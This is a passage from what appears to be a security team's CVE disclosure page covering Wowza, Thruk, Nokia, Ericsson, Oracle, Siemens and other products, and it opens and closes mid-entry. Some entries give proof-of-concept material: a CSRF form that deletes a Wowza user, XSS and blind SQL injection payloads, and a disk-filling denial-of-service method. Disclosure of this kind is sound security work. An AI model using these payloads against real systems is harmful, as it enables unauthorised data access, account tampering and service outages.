On the filesystem side, a new file of 280 KB will be created, as depicted by the following screenshot:

CVE-2021-35492-5

Figure 5: DoS - New virtual host file on the filesystem

Click here to enlarge the image

To massively exploit this condition, multiple requests with different vhost values have to be sent.

To send those requests reliably, the browser session has to be left active.

Session timeout can be prevented by installing a browser plugin like Tab Reloader and configure it to refresh the tab every 1 minute, like the following example:

CVE-2021-35492-6

Figure 6: DoS - Session timeout prevention - Tab Reloader

Click here to enlarge the image

Then it is possible to create a custom script to randomize the vhost parameter to a new value to be sent every time.

./dos-exploit-wse.py

When executing such tool, it is possible to exhaust the filesystem by creating 5.5 GB of files every 30 minutes.

The effect can be summarized on the following screenshot, which depicts multiple files created on the filesystem and the difference of the stats directory size after 30 minutes of the tool execution:

CVE-2021-35492-7

Figure 7: DoS - DoS exploit effect

Click here to enlarge the image

CVE-2021-35491 – Wowza Streaming Engine

Vulnerability Description: Cross-Site Request Forgery (CSRF) - CWE-352
Software Version: <= 4.8.11+5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35491
CVSv3: 8.1
Severity
: High
Credits:
 Veno Eivazian, Massimiliano Brolli

A remote attacker is able to delete a user without the victim's knowledge, by enticing an authenticated admin user to visit an attacker's web page. The application does not implement a CSRF token for the GET request. An attacker can craft an HTML page with a forged request on /enginemanager/server/user/delete.htm URL and send it to the victim.

Prerequisites: None.

Step-by-step instructions and PoC

An authenticated user that visits a crafted HTML page with a forged request can delete a user on Wowza Streaming Engine on behalf of an administrator.

To exploit the vulnerability, a new user needs to be created for testing purpose.

First, create a new user from Server -> Users -> Add User.

CVE-2021-35491-1

Figure 1: CSRF - User creation

Click here to enlarge the image

Then, copy the following HTML to a file served on another machine, in this case a local Kali Linux, in the file: /var/www/html/csrf-delete-user.html

<html>
     <body>
          <script>history.pushState('', '', '/')</script>
          <form action="http://wse.local:8088/enginemanager/server/user/delete.htm">
               <input type="hidden" name="userName" value="pippo" />
               <input type="submit" value="Submit request" />
          </form>
     </body>
</html>

Enable the local web server on the attacker machine:

sudo /etc/init.d/apache2 start

From an authenticated browser session to Wowza Streaming Engine with administrative privileges, open a new tab and go to the page http://127.0.0.1/csrf-delete-user.html.

CVE-2021-35491-2

Figure 2: CSRF - PoC HTML page

Click here to enlarge the image

Select Submit request, to force the administrator to delete the selected user.

The request will be sent to the web application, and the user will be deleted:

 

CVE-2021-35491-3

Figure 3: CSRF - User deleted

Click here to enlarge the image

It was also found that the wowzaSecurityToken HTTP parameter is not present in this GET request. In this case, the application accepts the request and processes it every time.

This is not true in the case of user creation, where that parameter is present and correctly validated.

CVE-2021-35490 – Thruk

Vulnerability Description:  Stored Cross-Site Scripting - CWE-79
Software Version: <= 2.44
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35490
CVSv3: 5.4
Severity: Medium
Credits
: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli

Thruk versions 2.44 and previous allow Stored XSS on a specific parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

CVE-2021-35489 – Thruk

Vulnerability Description: Reflected Cross-Site Scripting - CWE-79
Software Version: <= 2.40-2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35489
CVSv3: 6.1
Severity: Medium
Credits: Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli

Thruk version 2.40-2 allows /thruk/#cgi-bin/extinfo.cgi?type=2&host=[HOSTNAME]&service=[SERVICENAME]&backend=[BACKEND] Reflected XSS on 'host' and 'service' parameters. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into extinfo.cgi. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

The vulnerable functionality can be reached through the following URL:

  • /thruk/#cgi-bin/extinfo.cgi?type=2&host=[HOSTNAME]&service=[SERVICENAME]&backend=[BACKEND]

A PoC is possible inserting the malicious payload in one of the host or service fields (GET Request):

  • --></script><script>alert(1337)</script>

This occurs due to the closure of a comment, as demonstrated in the next screenshot.

CVE-2021-35489-1

Figure 1: Reflected XSS on extinfo.cgi – Payload 1

Click here to enlarge the image

Some other screenshots demonstrating the vulnerability:

CVE-2021-35489-2

Figure 2: Reflected XSS on extinfo.cgi – Payload 2

Click here to enlarge the image

CVE-2021-35489-3

Figure 3: Reflected XSS on extinfo.cgi – Payload 3

Click here to enlarge the image

CVE-2021-35489-4

Figure 4: Reflected XSS on extinfo.cgi – Payload 4

Click here to enlarge the image

CVE-2021-35488 – Thruk

Vulnerability Description: Reflected Cross-Site Scripting - CWE-79
Software Version: <= 2.40-2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35488
CVSv3: 6.1
Severity
: Medium
Credits:
 Mattia Campanelli, Alessandro Bosco, Alessandro Sabetta, Massimiliano Brolli

Thruk version 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title=[TITLE] Reflected XSS on 'host' and 'title' parameters. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into status.cgi. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

The vulnerable functionality can be reached through the following URLs:

  • /thruk/#cgi-bin/status.cgi?host=[HOSTNAME]&style=detail
  • /thruk/#cgi-bin/status.cgi?style=combined&title=[TITLE]

A PoC is possible inserting the malicious payload in one of the host or title fields (GET Request):

  • --></script><script>alert(1337)</script>

This occurs due to the closure of a comment, as demonstrated in the next screenshot.
 

CVE-2021-35488

Figure 1: Reflected XSS on status.cgi – Payload 1

Click here to enlarge the image

CVE-2021-35487 – Nokia Broadcast Message Center

Vulnerability Description: Boolean Blind SQL Injection - CWE-89
Software Version: <= 11.1.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-35487
CVSv3: 6.5
Severity
: Medium
Credits:
 Marco Raimondi, Francesco Pigini, Massimiliano Brolli

A remote user, authenticated on the Broadcast Message Center, can navigate the application in the ALERTS --> Manage Alerts section. Within Search Options it is possible to select Basic Search and by specifying the extIdentifier parameter, arbitrary queries in the application database can be executed.

Through these queries it is possible to extrapolate arbitrary information, not foreseen by the application logic, such as the user of the system that executes the queries, the dbms version, etc.

Depending on the permissions the user has on the database, different types of queries are possible and consequently different types of information can be extracted.

Payload used to exploit the vulnerability:

This first step consisted of inserting a single quote (') inside the search bar, in order to evaluate the behavior of the application. The result was an error message inside the database:

CVE-2021-35487-1

Figure 1: Single quote database error message

Click here to enlarge the image

At this point we tried to see if it was possible to execute arbitrary queries on the application. In this specific case, we tried to get the name of the user who executes the queries on the database. To do this we combined the mid() and user() functions. Being a Blind SQL Injection, if the query result was "true" we would get all the database alerts, otherwise we would get nothing, and we would have to go on with the letters of the alphabet:

CVE-2021-35487-2

Figure 2: True query request

Click here to enlarge the image

CVE-2021-35487-3

Figure 3: True query page behavior with alarms

Click here to enlarge the image

The result of the query is the entire list of alarms, so the first letter of the username is after "m" in the alphabet.

CVE-2021-35487-4

Figure 4: False query page behavior

Click here to enlarge the image


Using the letter n" we get nothing. Therefore, the first letter of the username is "n". Proceeding in this way it is possible to obtain the full name of the user.

At this point we try to confirm the username found by using the user() function directly:

CVE-2021-35487-5

Figure 5: User() function true request

Click here to enlarge the image

CVE-2021-35487-6

Figure 6: User() function true response page

Click here to enlarge the image

As we can see from the last image, using only the user() function with the name found from the previous steps, we get again the complete list of alarms, confirming that the username is correct.

Similarly, it is possible to proceed to get more information from the database.

CVE-2021-32571 – Ericsson OSS-RC

Vulnerability Description: Incomplete Cleanup. – CWE-459
Software Version: <=18B
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-32571
CVSv3: 4.9
Severity: Medium
Credits
: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli

In OSS-RC systems of the release 18B and older during data migration procedures certain files containing usernames and passwords are left in the system undeleted but in folders accessible by top privileged accounts only.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.

CVE-2021-32570 – Ericsson Network Manager

Vulnerability Description: Exposure of Resource to Wrong Sphere – CWE-668

Software Version: < 21.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-32570

CVSv3: 4.9

Severity: Medium

Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli

 

In ENM releases before 21.2 users belonging to the same AMOS authorization group can retrieve the data from certain log files. All AMOS users are considered to be highly privileged users in ENM system and all must be previously defined and authorized by the Security Administrator. Those users can access some log’s files, under a common path, and read information stored in the log’s files in order to conduct privilege escalation.

The vulnerability details can be shared from vendor to customers upon request.

CVE-2021-32569 – Ericsson OSS-RC

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (‘Reflected Cross-site Scripting’). – CWE-79
Software Version: <=18B
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-32569
CVSv3: 6.1
Severity: Medium
Credits
: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli

In OSS-RC systems of the release 18B and older customer documentation browsing libraries under ALEX are subject to Cross-Site Scripting. This problem is completely resolved in new Ericsson library browsing tool ELEX used in systems like Ericsson Network Manager.

NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.
 

CVE-2021-31540 - WOWZA Streaming Engine

Vulnerability Description: CWE-732: Incorrect Permission Assignment for Critical Resource
Software Version: < 4.8.5
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-31540
CVSv3: 7.1
Severity: High
Credits
: Francesco Giordano, Massimiliano Brolli

CVE-2021-31540

Wowza Streaming Engine through 4.8.5 (in a default installation) has incorrect file permissions of configuration files in the conf/ directory. A regular local user is able to read and write to all the configuration files, e.g., modify the application server configuration.

Figure 1: File permissions

Click here to enlarge the image

CVE-2021-31539 - WOWZA Streaming Engine

Vulnerability Description: CWE-312: Cleartext Storage of Sensitive Information
Software Version: < 4.8.5
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-31539
CVSv3: 5.5
Severity: Medium
Credits
: Francesco Giordano, Massimiliano Brolli

CVE-2021-31539

Wowza Streaming Engine through 4.8.5 (in a default installation) has cleartext passwords stored in the conf/admin.password file. A regular local user is able to read usernames and passwords.

Figure 1: File permissions

Click here to enlarge the image

CVE-2021-29661 – Softing AG OPC Toolbox

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: Softing AG OPC Toolbox v4.10.1.13035
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-29661
CVSv3: 5.4
Severity: Medium
Credits
: Gianni Palombizio, Michele Cisternino, Stefano Scipioni, Massimiliano Brolli

Softing AG OPC Toolbox version 4.10.1.13035 allows /en/diag_values.html Stored XSS on ITEMLISTVALUES##ITEMID parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into the trace file. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

CVE-2021-29661-1

After logging in to the application with a valid user, the full request is shown on the left

Figure 1: Full HTTP request

Click here to enlarge the image

CVE-2021-29661-2

The malicious payload is: “><script>alert(‘XSS’)</script>

The JavaScript code is executed when the victim user navigates the tab “Diagnostic/Trace”fff

Figure 2: XSS on response page

Click here to enlarge the image

CVE-2021-29660 – Softing AG OPC Toolbox

Vulnerability Description: Cross-Site Request Forgery (CSRF) - CWE-352
Software Version: Softing AG OPC Toolbox v4.10.1.13035
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-29660
CVSv3: 8.8
Severity: High
Credits
: Gianni Palombizio, Michele Cisternino, Stefano Scipioni, Massimiliano Brolli

A Cross-Site Request Forgery (CSRF) vulnerability in Softing AG OPC Toolbox version 4.10.1.13035 and earlier allows attackers to reset the administrative password by inducing the Administrator user to browse a URL controlled by an attacker.

CVE-2021-29660-1

Create and serve a web page containing the following HTML code shown on the left.

Figure 1: HTML code for CSRF victim

Click here to enlarge the image

CVE-2021-29660-2

The authenticated administrator browses the page configured by the attacker. The password reset request is made to the web application, using the admin's browsing session.

Figure 2: The page is served on the attacker system and requested by the victim

Click here to enlarge the image

CVE-2021-29660-3

The password of the "Administrator" user is reset successfully

Figure 3: CSRF password reset request executed successfully

Click here to enlarge the image

CVE-2021-28979 - Thales SafeNet KeySecure Management Console

Vulnerability Description: CWE-312: Cleartext Storage of Sensitive Information
Software Version: <= 8.12.2
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-28979
CVSv3: 6.5
Severity: Medium
Credits
: Luca Di Giuseppe, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli

SafeNet KeySecure Management Console 8.12.0 is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked.

CVE-2021-28488 – Ericsson Network Manager

Vulnerability Description: Exposure of Resource to Wrong Sphere – CWE-668
Software Version: < 21.2
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-28488
CVSv3: 6.5
Severity: Medium
Credits
: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli

In ENM releases before 21.2 users belonging to the same AMOS authorization group can retrieve the data related to managed network from each other. All AMOS users are considered to be highly privileged users in ENM system and all users must be previously defined and authorized by the Security Administrator. The vulnerability details can be shared from vendor to customers upon request.

CVE-2021-28485 – Ericsson MSC

Vulnerability Description: Relative Path Traversal (CWE-23)

Software Version: MSC-S IS 3.1 before IS 3.1 CP22

NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28485

CVSv3: 4.3

Severity: Medium

Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli

In Ericsson Mobile Switching Center Server (MSC-S) before IS 3.1 CP22, the SIS web application allows relative path traversal via a specific parameter in the https request after authentication, which allows access to files on the system that are not intended to be accessible via the web application. There is low impact to confidentiality because the affected files are limited to what the OTP webserver can access.

CVE-2021-28250 – CA eHealth Performance Manager

Vulnerability Description: Privilege Escalation via SUID/GUID file - CWE-250
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-28250
CVSv3: 7.8
Severity: High
Credits
: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli

CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a setuid (and/or setgid) file. When a component is run as an argument of the runpicEhealth executable, the script code will be executed as the ehealth user.

CVE-2021-28249 – CA eHealth Performance Manager

Vulnerability Description: Privilege Escalation via Dynamically Linked Shared Object Library - CWE-426
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-28249
CVSv3: 8.8
Severity: High
Credits
: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli

CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a Dynamically Linked Shared Object Library. To exploit the vulnerability, the ehealth user must create a malicious library in the writable RPATH, to be dynamically linked when the FtpCollector executable is run. The code in the library will be executed as the root user.

CVE-2021-28248 – CA eHealth Performance Manager

Vulnerability Description: Improper Restriction of Excessive Authentication Attempts - CWE-307
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-28248
CVSv3: 7.5
Severity: High
Credits
: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli

CA eHealth Performance Manager through 6.3.2.12 is affected by Improper Restriction of Excessive Authentication Attempts. An attacker is able to perform an arbitrary number of /web/frames/ authentication attempts using different passwords, and eventually gain access to a targeted account.

CVE-2021-28247 – CA eHealth Performance Manager

Vulnerability Description: Multiple Reflected Cross-site Scripting - CWE-79
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-28247
CVSv3: 5.4
Severity: Medium
Credits
: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli

CA eHealth Performance Manager through 6.3.2.12 is affected by Cross Site Scripting (XSS). The impact is: An authenticated remote user is able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and perform a Reflected Cross-Site Scripting attack against the platform users. The affected endpoints are: cgi/nhWeb with the parameter report, aviewbin/filtermibobjects.pl with the parameter namefilter, and aviewbin/query.pl with the parameters System, SystemText, Group, and GroupText.

CVE-2021-28246 – CA eHealth Performance Manager

Vulnerability Description: Privilege Escalation via Dynamically Linked Shared Object Library - CWE-426
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-28246
CVSv3: 7.8
Severity: High
Credits
: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli

CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a Dynamically Linked Shared Object Library. A regular user must create a malicious library in the writable RPATH, to be dynamically linked when the emtgtctl2 executable is run. The code in the library will be executed as the ehealth user.

CVE-2021-26597 – NOKIA NetAct

Vulnerability Description: Unrestricted Upload of File with Dangerous Type - CWE-434
Software Version: NOKIA NetAct 18A
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-26597
CVSv3: 6.5
Severity: Medium
Credits
: Raffaella Robles, Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in Nokia NetAct 18A. A remote user, authenticated to the NOKIA NetAct Web Page, can visit the Site Configuration Tool web site section and arbitrarily upload potentially dangerous files without restrictions via the /netact/sct dir parameter in conjunction with the operation=upload value.

 

CVE-2021-26596 – NOKIA NetAct

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: NOKIA NetAct 18A
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-26596
CVSv3: 5.4
Severity: Medium
Credits
: Raffaella Robles, Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in Nokia NetAct 18A. A malicious user can change a filename of an uploaded file to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /netact/sct filename parameter is used.

CVE-2021-3314 - Oracle GlassFish Server

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: <= 3.1.2.18
NIST:  https://nvd.nist.gov/vuln/detail/CVE-2021-3314
CVSv3: 6.1
Severity: Medium
Credits
: Francesco Giordano, Massimiliano Brolli

** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVE-2021-2005 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware

Vulnerability Description: URL Redirection to Untrusted Site ('Open Redirect')
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2021-2005
Oracle Credits CPU 2021: https://www.oracle.com/security-alerts/cpujan2021.html
CVSv3: 4.7
Severity: Medium
Credits
: Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli

Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows unauthenticated attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application.

CVE-2020-35590 – WordPress Plugin Limit Login Attempts Reloaded

Vulnerability Description: Improper Restriction of Excessive Authentication Attempts (Rate Limit Bypass on login page)
Software Version: WordPress Plugin Limit Login Attempts Reloaded versions 2.13.0 – 2.17.3.
NIST
https://nvd.nist.gov/vuln/detail/CVE-2020-35590
CVSv3: 9.8
Severity: Critical
Credits
: Veno Eivazian

LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not limited to perform a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count does not ever reach the maximum allowed retries.

CVE-2020-35589 – WordPress Plugin Limit Login Attempts Reloaded

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - CWE-79
Software Version: WordPress Plugin Limit Login Attempts Reloaded versions 2.13.0 – 2.17.3.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-35589
CVSv3: 5.4
Severity: Medium
Credits
: Veno Eivazian

The limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows wp-admin/options-general.php?page=limit-login-attempts&tab= XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims.

CVE-2020-28209 – Schneider Electric StruxureWare Building Operation Enterprise Server Installer – Enterprise Central Installer

Vulnerability Description: Windows Unquoted Search Path
Software Version: Schneider Electric StruxureWare Building Operation Enterprise Server Installer versions 1.0 – 3.1 and Enterprise Central Installer versions 2.0 – 3.1.
NISThttps://nvd.nist.gov/vuln/detail/CVE-2020-28209
CVSv3: 7.0
Severity: High
Credits
: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli

Any local Windows user who has write permission on at least one of the subfolders of the Connect Agent service binary path, being able to gain the privilege of the user who started the service. By default, the Enterprise Server and Enterprise Central is always installed at a location requiring Administrator privileges so the vulnerability is only valid if the application has been installed on a non-secure location.

CVE-2020-27583 – IBM InfoSphere Information Server

Vulnerability Description: CWE-502: Deserialization of Untrusted Data
Software Version: IBM InfoSphere Information Server 8.5.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-27583
CVSv3: 9.8
Severity: Critical
Credits
: Damiano Proietti, Davide De Rubeis, Matteo Brutti, Alessandro Sabetta, Massimiliano Brolli

IBM InfoSphere Information Server 8.5.0.0 is affected by deserialization of untrusted data which could allow remote unauthenticated attackers to execute arbitrary code.

CVE-2020-17458 – MultiUX

Vulnerability Description: Stored Xss
Software Version: 3.1.12.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-17458
CVSv3: 5.4
Severity
: Medium
Credits:
 Francesco Giordano, Sebastiano Lanzarotto, Francesco Pigini, Massimiliano Brolli

Multiple XSS were found in MultiUX, almost every parameter in the mailbox creation page is vulnerable to stored XSS.

CVE-2020-17457 – Fujitsu ServerView Suite iRMC

Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - CWE-79
Software Version: Fujitsu ServerView Suite iRMC v8.08F
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-17457
CVSv3: 5.4
Severity
: Medium
Credits:
 Damiano Proietti, Stefano Scipioni, Massimiliano Brolli

Fujitsu ServerView Suite iRMC before 9.62F allows ‘/54?ms=9&lang=0&sid=’ XSS on PSCU_FILE_INIT parameter. A malicious user can insert a malicious payload in the XML configuration file. After selecting ‘Save Configuration’, the payload is triggered in the error response page, which is then reflected to the user and executed by the web browser.

The full request is the following:

CVE-2020-15794

Figure 1: The full HTTP request

Click here to enlarge the image

The JavaScript code is executed when the error message is displayed:

CVE-2020-15794

Figure 2: XSS on error message

Click here to enlarge the image

CVE-2020-15794 – Siemens Desigo Insight

Vulnerability Description: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15794
CVSv3: 4.3
Severity
: Medium
Credits:
 Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli

Some error messages in the web application show the absolute path to the requested resource. This could allow an authenticated attacker to retrieve additional information about the host system.

The following URL is enough to trigger the vulnerability:

  • http://[IP]:[PORT]/desigo/plant-viewer.aspx?page=[NON-EXISTENT PAGE]
CVE-2020-15794

Figure 1: if the requested file doesn't exist, the application returns the full path it searched in

Click here to enlarge the image

CVE-2020-15793 – Siemens Desigo Insight

Vulnerability Description: CWE-1021: Improper Restriction of Rendered UI Layers or Frames
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15793
CVSv3: 4.5
Severity
: Medium
Credits:
 Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli

The device does not properly set the X-Frame-Options HTTP Header which makes it vulnerable to Clickjacking attacks. This could allow an unauthenticated attacker to retrieve or modify data in the context of a legitimate user by tricking that user to click on a website controlled by the attacker.

CVE-2020-15792 – Siemens Desigo Insight

Vulnerability Description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15792
CVSv3: 4.3
Severity
: Medium
Credits:
 Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli

The web service does not properly apply input validation for the ID query parameter in a reserved area on the following URL

  • http://[IP]:[PORT]/desigo/lv-proprierties.aspx?id=[ID][SQL expression]

This could allow an authenticated attacker to retrieve data via a content-based blind SQL injection attack, using for example the following payloads:

CVE-2020-15792

Figure 1: true condition returns the object 465587

For a “true” response:

id=465587%20and%20%20%27asd%27=%27asd%27%20—

Click here to enlarge the image

CVE-2020-15792

Figure 2: false condition returns an error on the index

For a “false” response:

id=465587%20and%20%20%27asd%27=%27xxx%27%20—

Click here to enlarge the image

CVE-2020-14843 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware

Vulnerability Description: Unrestricted Upload of File with Dangerous Type
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14843
Oracle Credits CPU 2020: https://www.oracle.com/security-alerts/cpuoct2020.html
CVSv3: 7.1
Severity
: High
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli

Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows authenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as, malware spreading, unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data.

CVE-2020-14842 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware

Vulnerability Description:

  • Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting Stored)
  • Unrestricted Upload of File with Dangerous Type

Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14842
Oracle Credits CPU 2020: https://www.oracle.com/security-alerts/cpuoct2020.html
CVSv3:
8.2
Severity
: High
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli

Multiple vulnerabilities in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows authenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as, malware spreading, unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data

CVE-2020-14690 – ORACLE Business Intelligence Enterprise Edition of Oracle Fusion Middleware

Vulnerability Description:

  • Cross-site scripting stored
  • Cross-site scripting

Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14690
CVSv3: 8.2
Severity
: High
Credits:
Alessandro Bosco, Edoardo Predieri, Fabio Minarelli, Francesco Russo, Luca Di Giuseppe, Massimiliano Brolli

Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data.

CVE-2020-12081 – FlexNet Publisher

Vulnerability Description:

Improper Limitation of a Pathname to a Restricted Directory ('Full Path Traversal') - CWE-22

Software Version: FlexNet Publisher 11.12.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-12081
CVSv3: 7.5
Severity
: High
Credits:
 Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli

Step-by-step instructions and PoC

A remote user, authenticated to FlexNet Publisher License Administrator, is able to define an arbitrary full path name where to save the application logs. By using the functionality of "view logs" the attacker can access the content of the previous specified file.

Affected Endpoints:

  • URL: http://hostname/vendor
  • Parameter: logFile
  • Function: Change log path and name

Below are the evidences with the vulnerability details and the payloads used.

CVE-2020-12081

The HTTP request used by the attacker to change the full path name of the logs to win.ini (click here to enlarge the image)

CVE-2020-12081

Using the function of "view logs" the malicious user can access to the previously specified file (click here to enlarge the image)

Security Impact

By exploiting this issue an attacker is able to read arbitrary file from file system of the target server.

CVE-2020-9050 – Johnson Controls Metasys MREWeb Service

Vulnerability Description: CWE-22: Full Path Traversal
